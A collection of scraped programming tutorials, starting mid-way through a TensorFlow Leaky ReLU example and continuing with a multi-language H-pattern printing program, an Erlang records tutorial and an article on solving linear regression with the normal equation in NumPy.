Tensor(\"ReLU_9:0\", shape=(6, ), dtype=float32)\nOutput: [ 1. 0. 3.4000001 0. 0. 0. ]\n" }, { "code": null, "e": 2822, "s": 2435, "text": " Leaky ReLU:The ReLU function suffers from what is called the “dying ReLU” problem. Since the slope of the ReLU function on the negative side is zero, a neuron stuck on that side is unlikely to recover from it. This causes the neuron to output zero for every input, thus rendering it useless. A solution to this problem is to use Leaky ReLU which has a small slope on the negative side." }, { "code": null, "e": 2896, "s": 2822, "text": "The function nn.leaky_relu() provides support for the ReLU in Tensorflow." 
}, { "code": null, "e": 2949, "s": 2896, "text": "Syntax: tf.nn.leaky_relu(features, alpha, name=None)" }, { "code": null, "e": 3211, "s": 2949, "text": "Parameters:features: A tensor of any of the following types: float32, float64, int32, uint8, int16, int8, int64, bfloat16, uint16, half, uint32, uint64.alpha: The slope of the function for x < 0. Default value is 0.2.name (optional): The name for the operation." }, { "code": null, "e": 3273, "s": 3211, "text": "Return type: A tensor with the same type as that of features." }, { "code": "# Importing the Tensorflow libraryimport tensorflow as tf # A constant vector of size 6a = tf.constant([1.0, -0.5, 3.4, -2.1, 0.0, -6.5], dtype=tf.float32) # Applying the Leaky ReLu function with# slope 0.01 and storing the result in 'b'b = tf.nn.leaky_relu(a, alpha=0.01, name='Leaky_ReLU') # Initiating a Tensorflow sessionwith tf.Session() as sess: print('Input type:', a) print('Input:', sess.run(a)) print('Return type:', b) print('Output:', sess.run(b))", "e": 3750, "s": 3273, "text": null }, { "code": null, "e": 3758, "s": 3750, "text": "Output:" }, { "code": null, "e": 4042, "s": 3758, "text": "Input type: Tensor(\"Const_2:0\", shape=(6,), dtype=float32)\nInput: [ 1. -0.5 3.4000001 -2.0999999 0. -6.5 ]\nReturn type: Tensor(\"Leaky_ReLU_1/Maximum:0\", shape=(6,), dtype=float32)\nOutput: [ 1. -0.005 3.4000001 -0.021 0. -0.065 ]\n" }, { "code": null, "e": 4057, "s": 4042, "text": "Neural Network" }, { "code": null, "e": 4074, "s": 4057, "text": "Python-Functions" }, { "code": null, "e": 4085, "s": 4074, "text": "Tensorflow" }, { "code": null, "e": 4102, "s": 4085, "text": "Machine Learning" }, { "code": null, "e": 4109, "s": 4102, "text": "Python" }, { "code": null, "e": 4126, "s": 4109, "text": "Machine Learning" } ]
Program to print the given H Pattern
27 Apr, 2021

Given an integer N, the task is to print the Alphabet H Pattern as given below:

1 N
2 *
3 3
* 2
N * 3 2 1
* 2
3 3
2 *
1 N

Examples:

Input: N = 3
Output:
1 3
2 2
3 2 1
2 2
1 3

Input: N = 4
Output:
1 4
2 3
3 2
4 3 2 1
3 2
2 3
1 4

Approach:

Print the Left value, leave 2 * (index - 1) blank spaces and print the Right value.
Print the Nth row with the numbers N down to 1.
Repeat step one for (2 * N) - 1 rows to print the desired H pattern.

Below is the implementation of the above approach (a compact alternative formulation in Python is sketched after the listings):

C++

// C++ implementation of the approach
#include <iostream>
using namespace std;

// Function to print the desired
// Alphabet H Pattern
void alphabetPattern(int N)
{
    // Declaring the values of left,
    // middle, right side
    int left = 0, middle = N - 1, right = N + 1;

    // Main Row Loop
    for (int row = 0; row < 2 * N - 1; row++) {

        // Condition for the left Values
        if (row < N)
            cout << ++left;
        else
            cout << --left;

        // Loop for the middle values
        for (int col = 1; col < N - 1; col++) {

            // Condition for the middleValues
            if (row != N - 1)
                // Two spaces for perfect alignment
                cout << " " << " ";
            else
                cout << " " << middle--;
        }

        // Condition for the right Values
        if (row < N)
            cout << " " << --right;
        else
            cout << " " << ++right;
        cout << endl;
    }
}

// Driver Code
int main()
{
    // Size of the Pattern
    int N = 4;
    alphabetPattern(N);
    return 0;
}

Java

// Java implementation of the approach
class GFG {

    // Function to print the desired
    // Alphabet H Pattern
    static void alphabetPattern(int N)
    {
        // Declaring the values of left,
        // middle, right side
        int left = 0, middle = N - 1, right = N + 1;

        // Main Row Loop
        for (int row = 0; row < 2 * N - 1; row++) {

            // Condition for the left Values
            if (row < N)
                System.out.print(++left);
            else
                System.out.print(--left);

            // Loop for the middle values
            for (int col = 1; col < N - 1; col++) {

                // Condition for the middleValues
                if (row != N - 1)
                    // Two spaces for perfect alignment
                    System.out.print("  ");
                else
                    System.out.print(" " + middle--);
            }

            // Condition for the right Values
            if (row < N)
                System.out.print(" " + --right);
            else
                System.out.print(" " + ++right);
            System.out.println();
        }
    }

    // Driver Code
    public static void main(String[] args)
    {
        // Size of the Pattern
        int N = 4;
        alphabetPattern(N);
    }
}

Python3

# Python3 implementation of the approach

# Function to print the desired
# Alphabet H Pattern
def alphabetPattern(N):

    # Declaring the values of left,
    # middle, right side
    left, middle, right = 0, N - 1, N + 1

    # Main Row Loop
    for row in range(0, 2 * N - 1):

        # Condition for the left Values
        if row < N:
            left += 1
            print(left, end = "")
        else:
            left -= 1
            print(left, end = "")

        # Loop for the middle values
        for col in range(1, N - 1):

            # Condition for the middleValues
            if row != N - 1:
                # Two spaces for perfect alignment
                print(" ", end = " ")
            else:
                print(" " + str(middle), end = "")
                middle -= 1

        # Condition for the right Values
        if row < N:
            right -= 1
            print(" " + str(right), end = "")
        else:
            right += 1
            print(" " + str(right), end = "")
        print()

# Driver Code
if __name__ == "__main__":

    # Size of the Pattern
    N = 4
    alphabetPattern(N)

C#

// C# implementation of the approach
using System;

class GFG {

    // Function to print the desired
    // Alphabet H Pattern
    static void alphabetPattern(int N)
    {
        // Declaring the values of left,
        // middle, right side
        int left = 0, middle = N - 1, right = N + 1;

        // Main Row Loop
        for (int row = 0; row < 2 * N - 1; row++) {

            // Condition for the left Values
            if (row < N)
                Console.Write(++left);
            else
                Console.Write(--left);

            // Loop for the middle values
            for (int col = 1; col < N - 1; col++) {

                // Condition for the middleValues
                if (row != N - 1)
                    // Two spaces for perfect alignment
                    Console.Write("  ");
                else
                    Console.Write(" " + middle--);
            }

            // Condition for the right Values
            if (row < N)
                Console.Write(" " + --right);
            else
                Console.Write(" " + ++right);
            Console.WriteLine();
        }
    }

    // Driver Code
    public static void Main(String[] args)
    {
        // Size of the Pattern
        int N = 4;
        alphabetPattern(N);
    }
}

PHP

<?php
// PHP implementation of the approach

// Function to print the desired
// Alphabet H Pattern
function alphabetPattern($N)
{
    // Declaring the values of left,
    // middle, right side
    $left = 0;
    $middle = $N - 1;
    $right = $N + 1;

    // Main Row Loop
    for ($row = 0; $row < 2 * $N - 1; $row++)
    {
        // Condition for the left Values
        if ($row < $N)
            echo (++$left);
        else
            echo (--$left);

        // Loop for the middle values
        for ($col = 1; $col < $N - 1; $col++)
        {
            // Condition for the middleValues
            if ($row != $N - 1)
                // Two spaces for perfect alignment
                echo " " . " ";
            else
                echo " " . ($middle--);
        }

        // Condition for the right Values
        if ($row < $N)
            echo " " . (--$right);
        else
            echo " " . (++$right);
        echo "\n";
    }
}

// Driver Code

// Size of the Pattern
$N = 4;
alphabetPattern($N);
?>

Javascript

<script>
    // JavaScript implementation of the approach

    // Function to print the desired
    // Alphabet H Pattern
    function alphabetPattern(N) {

        // Declaring the values of left,
        // middle, right side
        var left = 0, middle = N - 1, right = N + 1;

        // Main Row Loop
        for (var row = 0; row < 2 * N - 1; row++) {

            // Condition for the left Values
            if (row < N) {
                ++left;
                document.write(left);
            }
            else {
                --left;
                document.write(left);
            }

            // Loop for the middle values
            for (var col = 1; col < N - 1; col++) {

                // Condition for the middleValues
                if (row != N - 1)
                    // Two spaces for perfect alignment
                    document.write(" " + " ");
                else {
                    document.write(" " + middle);
                    middle--;
                }
            }

            // Condition for the right Values
            if (row < N) {
                --right;
                document.write(" " + right);
            }
            else {
                ++right;
                document.write(" " + right);
            }
            document.write("<br>");
        }
    }

    // Driver Code

    // Size of the Pattern
    var N = 4;
    alphabetPattern(N);
</script>

Output:

1 4
2 3
3 2
4 3 2 1
3 2
2 3
1 4
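For comparison, here is a compact alternative formulation in Python that computes each row's values in closed form instead of updating counters. It is only an illustrative sketch, not one of the original article's implementations, and it mirrors the spacing of the listings above (two spaces per middle column plus one before the right value), so the gap looks wider than in the condensed output shown here.

# Alternative sketch: closed-form row values instead of mutable counters
def h_pattern(n):
    rows = []
    for i in range(1, 2 * n):
        k = i if i <= n else 2 * n - i        # left value runs 1..n..1
        if k == n:
            rows.append(" ".join(str(v) for v in range(n, 0, -1)))
        else:
            gap = " " * (2 * (n - 2) + 1)     # same spacing as the C++ version
            rows.append(f"{k}{gap}{n + 1 - k}")
    return "\n".join(rows)

print(h_pattern(4))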
[ { "code": null, "e": 54, "s": 26, "text": "\n27 Apr, 2021" }, { "code": null, "e": 136, "s": 54, "text": "Given an integer N, the task is to print the Alphabet H Pattern as given below: " }, { "code": null, "e": 230, "s": 136, "text": "1 N\n2 *\n3 3\n* 2\nN * 3 2 1\n* 2\n3 3\n2 * \n1 N" }, { "code": null, "e": 242, "s": 230, "text": "Examples: " }, { "code": null, "e": 373, "s": 242, "text": "Input: N = 3\nOutput: \n1 3\n2 2\n3 2 1\n2 2\n1 3\n\nInput: N = 4\nOutput: \n1 4\n2 3\n3 2\n4 3 2 1\n3 2\n2 3\n1 4" }, { "code": null, "e": 387, "s": 375, "text": "Approach: " }, { "code": null, "e": 468, "s": 387, "text": "Print the Left value and leave 2 * (index – 1) blank spaces & print Right value." }, { "code": null, "e": 506, "s": 468, "text": "Print the Nth row with N to 1 number." }, { "code": null, "e": 575, "s": 506, "text": "Repeat step one for (2 * N) – 1 time to print the desired H pattern." }, { "code": null, "e": 628, "s": 575, "text": "Below is the implementation of the above approach: " }, { "code": null, "e": 632, "s": 628, "text": "C++" }, { "code": null, "e": 637, "s": 632, "text": "Java" }, { "code": null, "e": 645, "s": 637, "text": "Python3" }, { "code": null, "e": 648, "s": 645, "text": "C#" }, { "code": null, "e": 652, "s": 648, "text": "PHP" }, { "code": null, "e": 663, "s": 652, "text": "Javascript" }, { "code": "// C++ implementation of the approach#include <iostream>using namespace std; // Function to print the desired// Alphabet H Patternvoid alphabetPattern(int N){ // Declaring the values of left, // middle, right side int left = 0, middle = N - 1, right = N + 1; // Main Row Loop for (int row = 0; row < 2 * N - 1; row++) { // Condition for the left Values if (row < N) cout << ++left; else cout << --left; // Loop for the middle values for (int col = 1; col < N - 1; col++) { // Condition for the middleValues if (row != N - 1) // Two spaces for perfect alignment cout << \" \" << \" \"; else cout << \" \" << middle--; } // Condition for the right Values if (row < N) cout << \" \" << --right; else cout << \" \" << ++right; cout << endl; }} // Driver Codeint main(){ // Size of the Pattern int N = 4; alphabetPattern(N); return 0;}", "e": 1735, "s": 663, "text": null }, { "code": "// Java implementation of the approachclass GFG{// Function to print the desired// Alphabet H Patternstatic void alphabetPattern(int N){ // Declaring the values of left, // middle, right side int left = 0, middle = N - 1, right = N + 1; // Main Row Loop for (int row = 0; row < 2 * N - 1; row++) { // Condition for the left Values if (row < N) System.out.print( ++left); else System.out.print(--left); // Loop for the middle values for (int col = 1; col < N - 1; col++) { // Condition for the middleValues if (row != N - 1) // Two spaces for perfect alignment System.out.print( \" \"); else System.out.print( \" \" +middle--); } // Condition for the right Values if (row < N) System.out.print( \" \" +--right); else System.out.print( \" \" + ++right); System.out.println(); }} // Driver Code public static void main(String[] args) { // Size of the Pattern int N = 4; alphabetPattern(N);// This code is contributed by Rajput-Ji }}", "e": 2907, "s": 1735, "text": null }, { "code": "# Python3 implementation of the approach # Function to print the desired# Alphabet H Patterndef alphabetPattern(N): # Declaring the values of left, # middle, right side left, middle, right = 0, N - 1, N + 1 # Main Row Loop for row in range(0, 2 * N - 1): # Condition for the left Values if row < N: left += 1 print(left, end = \"\") else: 
left -= 1 print(left, end = \"\") # Loop for the middle values for col in range(1, N - 1): # Condition for the middleValues if row != N - 1: # Two spaces for perfect alignment print(\" \", end = \" \") else: print(\" \" + str(middle), end = \"\") middle -= 1 # Condition for the right Values if row < N: right -= 1 print(\" \" + str(right), end = \"\") else: right += 1 print(\" \" + str(right), end = \"\") print() # Driver Codeif __name__ == \"__main__\": # Size of the Pattern N = 4 alphabetPattern(N) # This code is contributed by Rituraj Jain", "e": 4074, "s": 2907, "text": null }, { "code": "// C# implementation of the approachusing System; class GFG{ // Function to print the desired// Alphabet H Patternstatic void alphabetPattern(int N){ // Declaring the values of left, // middle, right side int left = 0, middle = N - 1, right = N + 1; // Main Row Loop for (int row = 0; row < 2 * N - 1; row++) { // Condition for the left Values if (row < N) Console.Write( ++left); else Console.Write(--left); // Loop for the middle values for (int col = 1; col < N - 1; col++) { // Condition for the middleValues if (row != N - 1) // Two spaces for perfect alignment Console.Write( \" \"); else Console.Write( \" \" + middle--); } // Condition for the right Values if (row < N) Console.Write( \" \" + --right); else Console.Write( \" \" + ++right); Console.WriteLine(); }} // Driver Codepublic static void Main(String[] args){ // Size of the Pattern int N = 4; alphabetPattern(N);}} // This code is contributed by// PrinciRaj1992", "e": 5254, "s": 4074, "text": null }, { "code": "<?php// PHP implementation of the approach // Function to print the desired// Alphabet H Patternfunction alphabetPattern($N){ // Declaring the values of left, // middle, right side $left = 0; $middle = $N - 1; $right = $N + 1; // Main Row Loop for ($row = 0; $row < 2 * $N - 1; $row++) { // Condition for the left Values if ($row < $N) echo (++$left); else echo (--$left); // Loop for the middle values for ($col = 1; $col < $N - 1; $col++) { // Condition for the middleValues if ($row != $N - 1) // Two spaces for perfect alignment echo \" \".\" \"; else echo \" \".($middle--); } // Condition for the right Values if ($row < $N) echo \" \".(--$right); else echo \" \".(++$right); echo \"\\n\"; }} // Driver Code // Size of the Pattern $N = 4; alphabetPattern($N); // This code is contributed by mits?>", "e": 6298, "s": 5254, "text": null }, { "code": "<script> // JavaScript implementation // of the approach // Function to print the desired // Alphabet H Pattern function alphabetPattern(N) { // Declaring the values of left, // middle, right side var left = 0, middle = N - 1, right = N + 1; // Main Row Loop for (var row = 0; row < 2 * N - 1; row++) { // Condition for the left Values if (row < N) { ++left; document.write(left); } else { --left; document.write(left); } // Loop for the middle values for (var col = 1; col < N - 1; col++) { // Condition for the middleValues if (row != N - 1) // Two spaces for perfect alignment document.write(\" \" + \" \"); else { document.write(\" \" + middle); middle--; } } // Condition for the right Values if (row < N) { --right; document.write(\" \" + right); } else { ++right; document.write(\" \" + right); } document.write(\"<br>\"); } } // Driver Code // Size of the Pattern var N = 4; alphabetPattern(N); </script>", "e": 7646, "s": 6298, "text": null }, { "code": null, "e": 7702, "s": 7646, "text": "1 4\n2 3\n3 2\n4 3 2 1\n3 2\n2 3\n1 4" }, { "code": null, "e": 7714, "s": 7704, "text": "Rajput-Ji" }, { "code": null, 
"e": 7727, "s": 7714, "text": "rituraj_jain" }, { "code": null, "e": 7741, "s": 7727, "text": "princiraj1992" }, { "code": null, "e": 7754, "s": 7741, "text": "Mithun Kumar" }, { "code": null, "e": 7761, "s": 7754, "text": "rdtank" }, { "code": null, "e": 7778, "s": 7761, "text": "pattern-printing" }, { "code": null, "e": 7791, "s": 7778, "text": "C++ Programs" }, { "code": null, "e": 7810, "s": 7791, "text": "School Programming" }, { "code": null, "e": 7827, "s": 7810, "text": "pattern-printing" } ]
Erlang - Records
Erlang has the extra facility to create records. These records consist of fields. For example, you can define a personal record which has 2 fields, one is the id and the other is the name field. In Erlang, you can then create various instances of this record to define multiple people with various names and id's.

Let's explore how we can work with records.

A record is created using the Record Identifier. In this record identifier, you specify the various fields which constitute the record. The general syntax and example are given below.

record(recordname, {Field1, Field2 ..Fieldn})

recordname − This is the name given to the record.

Field1, Field2 ..Fieldn − These are the list of various fields which constitute the record.

Return value − None.

-module(helloworld).
-export([start/0]).
-record(person, {name = "", id}).

start() ->
   P = #person{name="John", id = 1}.

The above example shows the definition of a record with 2 fields, one is the id and the other is the name. Also, a record is constructed in the following way −

#recordname {fieldName1 = value1, fieldName2 = value2 .. fieldNameN = valueN}

wherein you assign values to the respective fields when an instance of the record is defined.

To access the fields and values of a particular record, the following syntax should be used.

#recordname.Fieldname

recordname − This is the name given to the record.

Fieldname − This is the name of the field which needs to be accessed.

Return value − The value assigned to the field.

-module(helloworld).
-export([start/0]).
-record(person, {name = "", id}).

start() ->
   P = #person{name = "John", id = 1},
   io:fwrite("~p~n", [P#person.id]),
   io:fwrite("~p~n", [P#person.name]).

The output of the above program is as follows.

1
"John"

Updating a record value is done by changing the value of a particular field and then assigning the record to a new variable name. The general syntax and example are given below.

#recordname.Fieldname = newvalue

recordname − This is the name given to the record.

Fieldname − This is the name of the field which needs to be accessed.

newvalue − This is the new value which needs to be assigned to the field.

Return value − The new record with the new values assigned to the fields.

-module(helloworld).
-export([start/0]).
-record(person, {name = "", id}).

start() ->
   P = #person{name = "John", id = 1},
   P1 = P#person{name = "Dan"},

   io:fwrite("~p~n", [P1#person.id]),
   io:fwrite("~p~n", [P1#person.name]).

The output of the above program is as follows −

1
"Dan"

Erlang also has the facility to have nested records. The following example shows how these nested records can be created.

-module(helloworld).
-export([start/0]).
-record(person, {name = "", address}).
-record(employee, {person, id}).

start() ->
   P = #employee{person = #person{name = "John", address = "A"}, id = 1},
   io:fwrite("~p~n", [P#employee.id]).

In the above example the following things need to be noted −

We are first creating a person's record which has the field values of name and address.

We then define an employee record which has the person as a field and an additional field called id.

The output of the above program is as follows.

1
[ { "code": null, "e": 2615, "s": 2301, "text": "Erlang has the extra facility to create records. These records consist of fields. For example, you can define a personal record which has 2 fields, one is the id and the other is the name field. In Erlang, you can then create various instances of this record to define multiple people with various names and id’s." }, { "code": null, "e": 2659, "s": 2615, "text": "Let’s explore how we can work with records." }, { "code": null, "e": 2843, "s": 2659, "text": "A record is created using the Record Identifier. In this record identifier, you specify the various fields which constitute the record. The general syntax and example are given below." }, { "code": null, "e": 2890, "s": 2843, "text": "record(recordname , {Field1,Field2 ..Fieldn})\n" }, { "code": null, "e": 2941, "s": 2890, "text": "recordname − This is the name given to the record." }, { "code": null, "e": 2992, "s": 2941, "text": "recordname − This is the name given to the record." }, { "code": null, "e": 3083, "s": 2992, "text": "Field1,Field2 ..Fieldn − These are the list of various fields which constitute the record." }, { "code": null, "e": 3174, "s": 3083, "text": "Field1,Field2 ..Fieldn − These are the list of various fields which constitute the record." }, { "code": null, "e": 3179, "s": 3174, "text": "None" }, { "code": null, "e": 3306, "s": 3179, "text": "-module(helloworld). \n-export([start/0]). \n-record(person, {name = \"\", id}). \n\nstart() -> \n P = #person{name=\"John\",id = 1}." }, { "code": null, "e": 3466, "s": 3306, "text": "The above example shows the definition of a record with 2 fields, one is the id and the other is the name. Also, a record is constructed in the following way −" }, { "code": null, "e": 3545, "s": 3466, "text": "#recordname {fieldName1 = value1, fieldName2 = value2 .. fieldNameN = valueN}\n" }, { "code": null, "e": 3640, "s": 3545, "text": "Where in you assign values to the respective fields when an instance of the record is defined." }, { "code": null, "e": 3733, "s": 3640, "text": "To access the fields and values of a particular record, the following syntax should be used." }, { "code": null, "e": 3756, "s": 3733, "text": "#recordname.Fieldname\n" }, { "code": null, "e": 3807, "s": 3756, "text": "recordname − This is the name given to the record." }, { "code": null, "e": 3858, "s": 3807, "text": "recordname − This is the name given to the record." }, { "code": null, "e": 3928, "s": 3858, "text": "Fieldname − This is the name of the field which needs to be accessed." }, { "code": null, "e": 3998, "s": 3928, "text": "Fieldname − This is the name of the field which needs to be accessed." }, { "code": null, "e": 4031, "s": 3998, "text": "The value assigned to the field." }, { "code": null, "e": 4236, "s": 4031, "text": "-module(helloworld). \n-export([start/0]). \n-record(person, {name = \"\", id}). \n\nstart() -> \n P = #person{name = \"John\",id = 1}, \n io:fwrite(\"~p~n\",[P#person.id]), \n io:fwrite(\"~p~n\",[P#person.name])." }, { "code": null, "e": 4283, "s": 4236, "text": "The output of the above program is as follows." }, { "code": null, "e": 4293, "s": 4283, "text": "1\n“John”\n" }, { "code": null, "e": 4477, "s": 4293, "text": "The updation of a record value is done by changing the value to a particular field and then assigning the record to a new variable name. The general syntax and example is given below." 
}, { "code": null, "e": 4511, "s": 4477, "text": "#recordname.Fieldname = newvalue\n" }, { "code": null, "e": 4562, "s": 4511, "text": "recordname − This is the name given to the record." }, { "code": null, "e": 4613, "s": 4562, "text": "recordname − This is the name given to the record." }, { "code": null, "e": 4683, "s": 4613, "text": "Fieldname − This is the name of the field which needs to be accessed." }, { "code": null, "e": 4753, "s": 4683, "text": "Fieldname − This is the name of the field which needs to be accessed." }, { "code": null, "e": 4827, "s": 4753, "text": "newvalue − This is the new value which needs to be assigned to the field." }, { "code": null, "e": 4901, "s": 4827, "text": "newvalue − This is the new value which needs to be assigned to the field." }, { "code": null, "e": 4960, "s": 4901, "text": "The new record with the new values assigned to the fields." }, { "code": null, "e": 5204, "s": 4960, "text": "-module(helloworld). \n-export([start/0]). \n-record(person, {name = \"\", id}). \n\nstart() -> \n P = #person{name = \"John\",id = 1}, \n P1 = P#person{name = \"Dan\"}, \n \n io:fwrite(\"~p~n\",[P1#person.id]), \n io:fwrite(\"~p~n\",[P1#person.name])." }, { "code": null, "e": 5252, "s": 5204, "text": "The output of the above program is as follows −" }, { "code": null, "e": 5261, "s": 5252, "text": "1\n“Dan”\n" }, { "code": null, "e": 5383, "s": 5261, "text": "Erlang also has the facility to have nested records. The following example shows how these nested records can be created." }, { "code": null, "e": 5624, "s": 5383, "text": "-module(helloworld). \n-export([start/0]). \n-record(person, {name = \"\", address}). \n-record(employee, {person, id}). \n\nstart() -> \n P = #employee{person = #person{name = \"John\",address = \"A\"},id = 1}, \n io:fwrite(\"~p~n\",[P#employee.id])." }, { "code": null, "e": 5685, "s": 5624, "text": "In the above example the following things need to be noted −" }, { "code": null, "e": 5773, "s": 5685, "text": "We are first creating a person’s record which has the field values of name and address." }, { "code": null, "e": 5861, "s": 5773, "text": "We are first creating a person’s record which has the field values of name and address." }, { "code": null, "e": 5962, "s": 5861, "text": "We then define an employee record which has the person as a field and an additional field called id." }, { "code": null, "e": 6063, "s": 5962, "text": "We then define an employee record which has the person as a field and an additional field called id." }, { "code": null, "e": 6110, "s": 6063, "text": "The output of the above program is as follows." }, { "code": null, "e": 6113, "s": 6110, "text": "1\n" }, { "code": null, "e": 6120, "s": 6113, "text": " Print" }, { "code": null, "e": 6131, "s": 6120, "text": " Add Notes" } ]
Performing Linear Regression Using the Normal Equation | by Robert Kwiatkowski | Towards Data Science
1. Introduction

Linear regression is one of the most important and popular predictive techniques in data analysis. It's also one of the oldest - the famous C.F. Gauss was already using it at the beginning of the 19th century in astronomy for the calculation of orbits.

Its objective is to fit the best line (or a hyper-/plane) to a set of given points (observations) by calculating the regression function parameters that minimize a specific cost function (error), e.g. the mean squared error (MSE).

As a reminder, the linear regression equation in its expanded form is:

y_hat = θ0 + θ1·x1 + θ2·x2 + ... + θn·xn

In a vectorized form it looks like this:

y_hat = θ^T · x

where θ is the vector of parameter weights.

Usually, finding the best model parameters is performed by running some kind of optimization algorithm (e.g. gradient descent) to minimize a cost function. However, it is also possible to obtain the values (weights) of these parameters by solving an algebraic equation called the normal equation:

θ = (X^T · X)^(-1) · X^T · y

2. Hand calculations

In this article, we will perform linear regression for a very basic case so we can avoid lengthy hand calculations. By the way, if you think you need to refresh your linear algebra skills, there are many good resources on the Internet (e.g. a YouTube series I recommend).

In this example, there are only three points (observations) with only one variable (X1): (1, 1), (2, 3) and (3, 2).

In this case, the linear regression equation has the form:

y_hat = θ0 + θ1·x1

Features (X) and labels (y) are:

X = [[1, 1],
     [1, 2],
     [1, 3]],    y = [[1], [3], [2]]

Note that we add a default bias term of 1 — it will be updated during our calculations. Not adding this term will lead to a wrong solution.

Step 1: Transposition of matrix X

This is a relatively simple task — rows become new columns:

X^T = [[1, 1, 1],
       [1, 2, 3]]

Step 2: Multiplication of the transposed matrix and matrix X

X^T · X = [[3, 6],
           [6, 14]]

Step 3: Inversion of the resultant matrix

To invert a simple 2x2 matrix we can use the formula:

[[a, b], [c, d]]^(-1) = 1/(ad - bc) · [[d, -b], [-c, a]]

Therefore, we get:

(X^T · X)^(-1) = 1/6 · [[14, -6],
                        [-6, 3]]

Note: for bigger matrices (bigger than 3x3), inverting them becomes a much more cumbersome task and usually an algorithmic approach is used — like Gaussian elimination. This is important to remember!

Step 4: Multiplication of the inverted matrix with X transposed

(X^T · X)^(-1) · X^T = 1/6 · [[8, 2, -4],
                              [-3, 0, 3]]

Step 5: Final multiplication to obtain the vector of best parameters

θ = (X^T · X)^(-1) · X^T · y = [1, 0.5]

Finally, our linear regression equation takes the form:

y_hat = 1 + 0.5·x1

Plotting this line through the three points gives the fitted regression line shown in the article's figure.

3. Implementation in Python

The same calculations can be implemented in Python using the Numpy library, which contains a set of linear algebra functions in the numpy.linalg collection.

import numpy as np

X = np.c_[[1,1,1],[1,2,3]]  # defining features
y = np.c_[[1,3,2]]  # defining labels
theta = np.linalg.inv(X.T.dot(X)).dot(X.T).dot(y)  # normal equation
print(theta)

Now we can define new features we would like to predict values for.

X_new = np.c_[[1,1,1,1],[0, 0.5,1.5,4]]  # new features

By applying the vectorized regression equation from the introduction we obtain the predicted values.

y_pred = X_new.dot(theta)  # making predictions
print(y_pred)

4. Comments

As you see, it's pretty easy to use the normal equation and to implement it in Python — it's only one line of code. So why is it not commonly used?

The problem is its numerical complexity. Solving this equation requires inverting a matrix, and this is a computationally expensive operation — depending on the implementation, in big O notation it is O(n^3) or slightly less. This means it scales up horribly; practically, when you double the number of features, the computation time increases by 2^3 = 8 times. There is also some chance that the result of step 2 is not invertible at all — causing big troubles. These are the reasons why in practice this approach is uncommon. On the bright side, this approach is calculated in just one step and you don't have to choose a learning rate parameter. Additionally, in terms of memory usage this approach is linear, O(m), meaning it stores huge datasets effectively as long as they fit into your computer's memory.
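Related to the invertibility problem mentioned above: instead of forming the explicit inverse, the same coefficients can be obtained with a pseudo-inverse or a least-squares solver, which also behave sensibly when X^T · X is singular. The following short sketch is a complement to the article's code (not part of the original) and reuses the same X and y.

import numpy as np

X = np.c_[[1, 1, 1], [1, 2, 3]]   # same features as above
y = np.c_[[1, 3, 2]]              # same labels as above

theta_pinv = np.linalg.pinv(X).dot(y)                 # Moore-Penrose pseudo-inverse
theta_lstsq, *_ = np.linalg.lstsq(X, y, rcond=None)   # least-squares solver

print(theta_pinv)    # both print approximately [[1. ], [0.5]]
print(theta_lstsq)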
[ { "code": null, "e": 188, "s": 172, "text": "1. Introduction" }, { "code": null, "e": 432, "s": 188, "text": "Linear regression is one of the most important and popular predictive techniques in data analysis. It’s also one of the oldest - famous C.F. Gauss at the beginning of 19th-century was using it in the astronomy for calculation of orbits (more)." }, { "code": null, "e": 655, "s": 432, "text": "Its objective is to fit the best line (or a hyper-/plane) to the set of given points (observations) by calculating regression function parameters that minimize specific cost function (error), e.g. mean squared error (MSE)." }, { "code": null, "e": 736, "s": 655, "text": "As a reminder, below there is a linear regression equation in the expanded form." }, { "code": null, "e": 777, "s": 736, "text": "In a vectorized form it looks like that:" }, { "code": null, "e": 820, "s": 777, "text": "where θ is a vector of parameters weights." }, { "code": null, "e": 1139, "s": 820, "text": "Usually finding the best model parameters is performed by running some kind of optimization algorithm (e.g. gradient descent) to minimize a cost function. However, it is possible to obtain values (weights) of these parameters by solving an algebraic equation called the normal equation as well. It is defined as below." }, { "code": null, "e": 1160, "s": 1139, "text": "2. Hand calculations" }, { "code": null, "e": 1430, "s": 1160, "text": "In this article, we will perform linear regression for a very basic case so we can avoid lengthy hand calculations. By the way, if you think you need to refresh your linear algebra skills, there are many good resources on the Internet (e.g. YouTube series I recommend)." }, { "code": null, "e": 1555, "s": 1430, "text": "In this example, there are only three points (observations) with only one variable (X1). On the graph, they look like below." }, { "code": null, "e": 1615, "s": 1555, "text": "In this case, the linear regression equation has a form of:" }, { "code": null, "e": 1648, "s": 1615, "text": "Features (X) and labels (y) are:" }, { "code": null, "e": 1788, "s": 1648, "text": "Note that we add a default bias term of 1 — it will be updated during our calculations. Not adding this term will lead to a wrong solution." }, { "code": null, "e": 1822, "s": 1788, "text": "Step 1: Transposition of matrix X" }, { "code": null, "e": 1882, "s": 1822, "text": "This is a relatively simple task — rows become new columns." }, { "code": null, "e": 1943, "s": 1882, "text": "Step 2: Multiplication on the transposed matrix and matrix X" }, { "code": null, "e": 1983, "s": 1943, "text": "Step 3: Inversion of a resultant matrix" }, { "code": null, "e": 2038, "s": 1983, "text": "To inverse a simple 2x2 matrix we can use the formula:" }, { "code": null, "e": 2057, "s": 2038, "text": "Therefore, we get:" }, { "code": null, "e": 2258, "s": 2057, "text": "Note: for bigger matrices (bigger than 3X3) inverting them becomes a much more cumbersome task and usually, the algorithmic approach is used — like Gaussian elimination. This is important to remember!" }, { "code": null, "e": 2322, "s": 2258, "text": "Step 4: Multiplication of the inverted matrix with X transposed" }, { "code": null, "e": 2391, "s": 2322, "text": "Step 5: Final multiplication to obtain the vector of best parameters" }, { "code": null, "e": 2446, "s": 2391, "text": "Finally our linear regression equations takes form of:" }, { "code": null, "e": 2505, "s": 2446, "text": "Plotting this line onto a previous graph looks like below." 
